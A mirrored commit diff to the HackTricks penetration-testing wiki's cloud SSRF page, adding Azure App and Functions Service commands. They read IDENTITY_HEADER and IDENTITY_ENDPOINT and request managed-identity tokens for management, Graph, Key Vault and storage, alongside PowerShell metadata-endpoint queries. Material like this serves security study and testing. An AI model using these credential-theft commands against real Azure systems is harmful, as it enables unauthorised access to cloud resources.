maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

GITBOOK-4454: No subject

Browse Source
This commit is contained in:
SirBroccoli 2024-12-24 12:58:35 +00:00 committed by gitbook-bot
parent 7d2aec8b8e
commit 9115fb9fb3
1 changed files with 24 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
View File

@ -451,6 +451,7 @@ curl -s -f -H "$HEADER" "$URL/identity/oauth2/token?api-version=$API_VERSION&res
{% endtab %}
{% tab title="PS" %}
{% code overflow="wrap" %}
```bash
# Powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -NoProxy -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64
@ -463,12 +464,13 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
/metadata/instance/compute/userData?api-version=2021-01-01&format=text
```
{% endcode %}
{% endtab %}
{% endtabs %}
### Azure App Service
### Azure App & Functions Services
From the **env** you can get the values of `IDENTITY_HEADER` _and_ `IDENTITY_ENDPOINT`. That you can use to gather a token to speak with the metadata server.
From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server.
Most of the time, you want a token for one of these resources:
@ -477,6 +479,13 @@ Most of the time, you want a token for one of these resources:
* [https://graph.microsoft.com](https://graph.microsoft.com/)
* [https://management.azure.com](https://management.azure.com/)
{% hint style="danger" %}
In the token requests use any of the parameters `object_id`, `client_id` or `msi_res_id` to indicate the managed identity you want to use ([**docs**](https://learn.microsoft.com/en-us/entra/identity/managed-identities-azure-resources/how-to-use-vm-token)). If none, the **default MI will be used**.
{% endhint %}
{% tabs %}
{% tab title="Bash" %}
{% code overflow="wrap" %}
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
@ -486,11 +495,19 @@ echo $IDENTITY_ENDPOINT
ls /opt/microsoft
# Get management token
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
curl "$IDENTITY_ENDPOINT?resource=https://graph.microsoft.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
# Get vault token
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
# Get storage token
curl "$IDENTITY_ENDPOINT?resource=https://storage.azure.com/&api-version=2019-08-01" -H "X-IDENTITY-HEADER:$IDENTITY_HEADER"
```
{% endcode %}
{% endtab %}
{% tab title="PS" %}
{% code overflow="wrap" %}
```powershell
# API request in powershell to management endpoint
$Token = 'eyJ0eX..'
@ -532,6 +549,9 @@ At line:1 char:1
+ FullyQualifiedErrorId :
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
```
{% endcode %}
{% endtab %}
{% endtabs %}
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>